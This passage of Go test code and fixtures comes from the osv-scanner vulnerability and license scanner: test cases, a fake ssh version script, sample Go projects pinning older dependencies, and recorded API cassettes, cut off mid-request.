"--licenses=MIT", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, { Name: "No_vulnerabilities_but_license_violations_with_allowlist", Args: []string{"", "source", "--licenses=Apache-2.0", "--config=./testdata/osv-scanner-empty-config.toml", "./testdata/locks-many/yarn.lock"}, Exit: 1, }, { Name: "Vulnerabilities_and_all_license_violations_allowlisted", Args: []string{"", "source", "--licenses=Apache-2.0", "./testdata/locks-many-with-insecure/package-lock.json"}, Exit: 1, }, { Name: "Some_packages_with_license_violations_and_show-all-packages_in_json", Args: []string{"", "source", "--format=json", "--licenses=MIT", "--all-packages", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "Some_packages_with_ignored_licenses", Args: []string{"", "source", "--config=./testdata/osv-scanner-complex-licenses-config.toml", "--licenses=MIT", "./testdata/locks-many", "./testdata/locks-insecure"}, Exit: 1, }, { Name: "Some_packages_with_license_violations_in_json", Args: []string{"", "source", "--format=json", "--licenses=MIT", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "No_license_violations_and_show-all-packages_in_json", Args: []string{"", "source", "--format=json", "--licenses=MIT,Apache-2.0", "--all-packages", "./testdata/locks-licenses/package-lock.json"}, Exit: 0, }, { Name: "Show_all_Packages_with_license_summary_in_json", Args: []string{"", "source", "--format=json", "--licenses", "--all-packages", "./testdata/locks-licenses/package-lock.json"}, Exit: 0, }, { Name: "Licenses_in_summary_mode_json", Args: []string{"", "source", "--format=json", "--licenses", "./testdata/locks-licenses/package-lock.json"}, Exit: 0, }, { Name: "Licenses_with_expressions", Args: []string{"", "source", "--config=./testdata/osv-scanner-expressive-licenses-config.toml", "--licenses=MIT,BSD-3-Clause", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "Licenses_with_invalid_licenses_in_flag", Args: []string{"", "source", "--licenses=MIT,something-something", "./testdata/locks-licenses/package-lock.json"}, Exit: 127, }, { Name: "Licenses_with_invalid_expression_in_config", Args: []string{"", "source", "--config=./testdata/osv-scanner-invalid-licenses-config.toml", "--licenses=MIT,BSD-3-Clause", "./testdata/locks-licenses/package-lock.json"}, Exit: 1, }, { Name: "When_offline_licenses_summary_cannot_be_printed", Args: []string{"", "source", "--offline", "--licenses", "./testdata/locks-many/package-lock.json"}, Exit: 127, }, { Name: "When_offline_licenses_cannot_be_checked", Args: []string{"", "source", "--offline", "--licenses=MIT", "./testdata/locks-many/package-lock.json"}, Exit: 127, }, { Name: "When_offline_licenses_are_still_validated", Args: []string{"", "source", "--offline", "--licenses=MIT,something-something", "./testdata/locks-many/package-lock.json"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_Transitive(t *testing.T) { t.Parallel() testutility.SkipIfShort(t) client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "pom.xml_transitive_default", Args: []string{"", "source", "./testdata/maven-transitive/pom.xml"}, Exit: 1, }, { Name: "pom.xml_transitive_explicit_lockfile", Args: []string{"", "source", "-L", "pom.xml:./testdata/maven-transitive/abc.xml"}, Exit: 1, }, { Name: "pom.xml_multiple_registries", Args: []string{"", "source", "-L", "pom.xml:./testdata/maven-transitive/registry.xml"}, Exit: 1, }, { Name: "pom.xml_transitive_native_source", Args: []string{"", "source", "--data-source=native", "-L", "pom.xml:./testdata/maven-transitive/registry.xml"}, Exit: 1, }, { Name: "pom.xml_non_utf8_encoding", Args: []string{"", "source", "-L", "pom.xml:./testdata/maven-transitive/encoding.xml"}, Exit: 1, }, { Name: "pom.xml_no_resolve_no_transitive", Args: []string{"", "source", "--no-resolve", "./testdata/maven-transitive/pom.xml"}, // Direct dependencies do not have any vulnerability. Exit: 0, }, { Name: "pom.xml_offline_no_transitive", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/maven-transitive/pom.xml"}, // Direct dependencies do not have any vulnerability. Exit: 0, }, { Name: "pom.xml_enricher_requires_extractor", Args: []string{"", "source", "--experimental-disable-plugins=java/pomxml", "./testdata/maven-transitive/abc.xml"}, Exit: 128, }, { Name: "invalid_data_source_error", Args: []string{"", "source", "--data-source=github", "-L", "pom.xml:./testdata/maven-transitive/registry.xml"}, Exit: 127, }, { Name: "requirements.txt_transitive_default", Args: []string{"", "source", "-L", "./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_transitive_native_source", Args: []string{"", "source", "--data-source=native", "-L", "requirements.txt:./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_no_resolve_no_transitive", Args: []string{"", "source", "--no-resolve", "./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_offline_no_transitive", Args: []string{"", "source", "--offline", "--download-offline-databases", "./testdata/locks-requirements/requirements.txt"}, Exit: 1, }, { Name: "requirements.txt_enricher_requires_extractor", Args: []string{"", "source", "--experimental-disable-plugins=python/requirements", "./testdata/locks-requirements/requirements-transitive.txt"}, Exit: 128, }, { Name: "requirements.txt_resolution_fallback", Args: []string{"", "source", "./testdata/locks-requirements/unresolvable-requirements.txt"}, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_MoreLockfiles(t *testing.T) { t.Parallel() client := testcmd.InsertCassette(t) tests := []testcmd.Case{ { Name: "uv.lock", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/uv.lock"}, Exit: 1, }, { Name: "depsjson", Args: []string{"", "source", "-L", "deps.json:./testdata/locks-scalibr/depsjson"}, Exit: 1, }, { Name: "cabal.project.freeze", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/cabal.project.freeze"}, Exit: 1, }, { Name: "stack.yaml.lock", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/stack.yaml.lock"}, Exit: 0, }, { Name: "packages.config", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/packages.config"}, Exit: 0, }, { Name: "packages.lock.json", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/packages.lock.json"}, Exit: 0, }, { Name: "gems.locked", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/gems.locked"}, Exit: 1, }, { Name: "Podfile.lock_-_Unsupported_ecosystem,_should_not_be_scanned", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/Podfile.lock"}, Exit: 127, }, { Name: "Package.resolved_-_Unsupported_ecosystem,_should_not_be_scanned", Args: []string{"", "source", "-L", "./testdata/locks-scalibr/Package.resolved"}, Exit: 127, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommandNonGit(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) err := os.CopyFS(testDir, os.DirFS("./testdata/locks-many")) if err != nil { t.Fatal(err) } client := testcmd.InsertCassette(t) tests := []testcmd.Case{ // one specific supported lockfile { Name: "one_specific_supported_lockfile", Args: []string{"", "source", filepath.Join(testDir, "composer.lock")}, Exit: 0, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() tt.HTTPClient = testcmd.WithTestNameHeader(t, *client) testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_HtmlFile(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) client := testcmd.InsertCassette(t) testcmd.RunAndMatchSnapshots(t, testcmd.Case{ Name: "one_specific_supported_lockfile", Args: []string{"", "source", "--format=html", "--output-file", testDir + "/report.html", "./testdata/locks-many/composer.lock"}, Exit: 0, HTTPClient: testcmd.WithTestNameHeader(t, *client), }) _, err := os.Stat(testDir + "/report.html") if err != nil { t.Errorf("Unexpected %v", err) } } func TestCommand_HtmlFile_Deprecated(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) client := testcmd.InsertCassette(t) testcmd.RunAndMatchSnapshots(t, testcmd.Case{ Name: "one_specific_supported_lockfile", Args: []string{"", "source", "--format=html", "--output", testDir + "/report.html", "./testdata/locks-many/composer.lock"}, Exit: 0, HTTPClient: testcmd.WithTestNameHeader(t, *client), }) _, err := os.Stat(testDir + "/report.html") if err != nil { t.Errorf("Unexpected %v", err) } } func TestCommand_WithDetector_OnLinux(t *testing.T) { if runtime.GOOS != "linux" { testutility.Skip(t, "The detector in this test only works on Linux") } testDir := testutility.CreateTestDir(t) err := os.CopyFS(testDir, os.DirFS("./testdata/locks-many")) if err != nil { t.Fatal(err) } err = os.CopyFS(testDir+"/bin", os.DirFS("./testdata/bin")) if err != nil { t.Fatal(err) } client := testcmd.InsertCassette(t) tests := []struct { Name string Args []string Exit int SSHV string }{ { Name: "ssh_version_is_before_first_vuln_version", Args: []string{ "", "source", "--experimental-plugins", "php/composerlock", "--experimental-plugins", "cve/cve-2023-38408", filepath.Join(testDir, "composer.lock"), }, Exit: 0, SSHV: "OpenSSH_5.4 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022", }, { Name: "ssh_version_is_after_last_vuln_version", Args: []string{ "", "source", "--experimental-plugins", "php/composerlock", "--experimental-plugins", "cve/cve-2023-38408", filepath.Join(testDir, "composer.lock"), }, Exit: 0, SSHV: "OpenSSH_9.3p2 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022", }, { Name: "ssh_version_errors", Args: []string{ "", "source", "--experimental-plugins", "php/composerlock", "--experimental-plugins", "cve/cve-2023-38408", filepath.Join(testDir, "composer.lock"), }, Exit: 0, SSHV: "", }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { // append our bin directory to the start of the PATH variable // so that our fake ssh script will be invoked by the detector t.Setenv("PATH", (testDir+"/bin/:")+os.Getenv("PATH")) t.Setenv("OSV_SCANNER_TEST_SSH_VERSION_OUTPUT", tt.SSHV) testcmd.RunAndMatchSnapshots(t, testcmd.Case{ Name: tt.Name, Args: tt.Args, Exit: tt.Exit, HTTPClient: testcmd.WithTestNameHeader(t, *client), }) }) } } func TestCommand_WithDetector_OffLinux(t *testing.T) { if runtime.GOOS == "linux" { testutility.Skip(t, "The detector in this test only works on non-linux") } testDir := testutility.CreateTestDir(t) err := os.CopyFS(testDir, os.DirFS("./testdata/locks-many")) if err != nil { t.Fatal(err) } err = os.CopyFS(testDir+"/bin", os.DirFS("./testdata/bin")) if err != nil { t.Fatal(err) } client := testcmd.InsertCassette(t) tests := []struct { Name string Args []string Exit int SSHV string }{ { Name: "ssh_version_is_before_first_vuln_version", Args: []string{ "", "source", "--experimental-plugins", "php/composerlock", "--experimental-plugins", "cve/cve-2023-38408", filepath.Join(testDir, "composer.lock"), }, Exit: 0, SSHV: "OpenSSH_5.4 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022", }, { Name: "ssh_version_is_after_last_vuln_version", Args: []string{ "", "source", "--experimental-plugins", "php/composerlock", "--experimental-plugins", "cve/cve-2023-38408", filepath.Join(testDir, "composer.lock"), }, Exit: 0, SSHV: "OpenSSH_9.3p2 Ubuntu-3ubuntu0.13, OpenSSL 3.0.2 15 Mar 2022", }, { Name: "ssh_version_errors", Args: []string{ "", "source", "--experimental-plugins", "php/composerlock", "--experimental-plugins", "cve/cve-2023-38408", filepath.Join(testDir, "composer.lock"), }, Exit: 0, SSHV: "", }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { // append our bin directory to the start of the PATH variable // so that our fake ssh script will be invoked by the detector t.Setenv("PATH", (testDir+"/bin/:")+os.Getenv("PATH")) t.Setenv("OSV_SCANNER_TEST_SSH_VERSION_OUTPUT", tt.SSHV) testcmd.RunAndMatchSnapshots(t, testcmd.Case{ Name: tt.Name, Args: tt.Args, Exit: tt.Exit, HTTPClient: testcmd.WithTestNameHeader(t, *client), }) }) } } func TestCommand_Filter(t *testing.T) { t.Parallel() tests := []testcmd.Case{ { Name: "Show_all_Packages_with_empty_config", Args: []string{"", "source", "--format=json", "--all-packages", "--config=./testdata/osv-scanner-empty-config.toml", "--lockfile=osv-scanner:./testdata/locks-insecure/osv-scanner-with-unscannables.json"}, Exit: 0, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() testcmd.RunAndMatchSnapshots(t, tt) }) } } func TestCommand_FlagDeprecatedPackages(t *testing.T) { t.Parallel() tests := []testcmd.Case{ { Name: "package_deprecated_false_no_vuln_json", Args: []string{ "", "source", "--format=json", "--experimental-flag-deprecated-packages", "./testdata/exp-plugins-pkgdeprecate/clean/Cargo.lock", }, Exit: 0, }, { Name: "package_deprecated_true_no_vuln_json", Args: []string{ "", "source", "--format=json", "--experimental-flag-deprecated-packages", "./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, }, }, { Name: "package_deprecated_true_with_vuln_json", Args: []string{ "", "source", "--format=json", "--experimental-flag-deprecated-packages", "./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, }, }, { Name: "package_deprecated_npm_json", Args: []string{ "", "source", "--format=json", "--experimental-flag-deprecated-packages", "./testdata/exp-plugins-pkgdeprecate/deprecated-npm/package-lock.json", }, Exit: 1, ReplaceRules: []testutility.JSONReplaceRule{ testutility.GroupsAsArrayLen, testutility.OnlyIDVulnsRule, }, }, { Name: "package_deprecated_true_no_vuln_table", Args: []string{ "", "source", "--format=table", "--experimental-flag-deprecated-packages", "./testdata/exp-plugins-pkgdeprecate/deprecated-novuln/Cargo.lock", }, Exit: 1, }, { Name: "package_deprecated_true_with_vuln_table", Args: []string{ "", "source", "--format=table", "--experimental-flag-deprecated-packages", "./testdata/exp-plugins-pkgdeprecate/deprecated-vuln/Cargo.lock", }, Exit: 1, }, } for _, tt := range tests { t.Run(tt.Name, func(t *testing.T) { t.Parallel() testcmd.RunAndMatchSnapshots(t, tt) }) } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/.goignore ================================================ call-analysis-go-project ================================================ FILE: cmd/osv-scanner/scan/source/testdata/artifact/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/bin/ssh ================================================ #!/usr/bin/env bash # this is a fake ssh used in some tests, which outputs the value of the # $OSV_SCANNER_TEST_SSH_VERSION_OUTPUT environment variable, unless it # is empty in which case the script exits with code 1 as if it errored if [ -z $OSV_SCANNER_TEST_SSH_VERSION_OUTPUT ]; then exit 1 fi echo "$OSV_SCANNER_TEST_SSH_VERSION_OUTPUT" ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 require github.com/gogo/protobuf v1.3.1 require github.com/ipfs/go-bitfield v1.0.0 require golang.org/x/image v0.4.0 // indirect ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/go.sum ================================================ github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls= github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ= golang.org/x/image v0.4.0/go.mod h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/main.go ================================================ package main import ( "log" "net/http" "github.com/gogo/protobuf/plugin/unmarshal" "github.com/gogo/protobuf/version" "github.com/ipfs/go-bitfield" ) func main() { print(version.AtLeast("v1.2.3")) unmarshal.NewUnmarshal() bitfield.NewBitfield(14) // Test stdlib err := http.ListenAndServe(":8080", nil) if err != nil { log.Fatal(err) } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 require github.com/gogo/protobuf v1.3.1 ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/go.sum ================================================ github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls= github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ= golang.org/x/image v0.4.0/go.mod h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/main.go ================================================ package main import ( "log" "net/http" "github.com/gogo/protobuf/plugin/unmarshal" "github.com/gogo/protobuf/version" ) func main() { print(version.AtLeast("v1.2.3")) unmarshal.NewUnmarshal() // Test stdlib err := http.ListenAndServe(":8080", nil) if err != nil { log.Fatal(err) } } ================================================ FILE: cmd/osv-scanner/scan/source/testdata/call-analysis-go-project-all-uncalled/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 270 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/.gitignored_files url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_cyclonedx_1.4_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_cyclonedx_1.5_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_gh-annotations_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_sarif_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Empty_spdx_2.3_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 141 host: api.osv.dev body: | { "queries": [ 